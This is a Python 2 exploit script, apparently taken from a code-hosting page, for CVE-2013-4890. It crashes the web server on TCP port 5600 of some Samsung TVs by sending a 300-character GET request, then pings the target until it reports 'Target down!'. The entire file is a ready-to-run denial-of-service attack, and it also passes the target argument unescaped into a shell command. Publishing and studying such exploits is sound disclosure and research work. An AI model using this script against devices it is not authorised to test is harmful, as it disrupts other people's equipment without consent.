36 lines
No EOL
1.4 KiB
Python
Executable file
36 lines
No EOL
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
|
|
# Date: 07/21/2013
|
|
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
|
|
# CVE Number: CVE-2013-4890
|
|
# Vendor Homepage: http://www.samsung.com
|
|
# Description: Resets some Samsung TVs
|
|
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
|
|
# Tested successfully on my Samsung PS50C7700 plasma TV :)
|
|
|
|
import httplib
|
|
import sys
|
|
import os
|
|
|
|
print " ***************************************************************************************"
|
|
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
|
|
print " Exploit: Denial of Service (DoS) attack\n"
|
|
print " Description: Resets some Samsung TVs\n"
|
|
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
|
|
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
|
|
print " ***************************************************************************************\n"
|
|
|
|
# Sends the payload
|
|
print " Sending the malicious payload...\n"
|
|
conn = httplib.HTTPConnection(sys.argv[1],5600)
|
|
conn.request("GET", "A"*300)
|
|
conn.close()
|
|
|
|
# Checks the response
|
|
print " Checking the status... (CTRL+Z to stop)\n"
|
|
response = 0
|
|
while response == 0:
|
|
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
|
|
if response != 0:
|
|
print " Target down!\n" |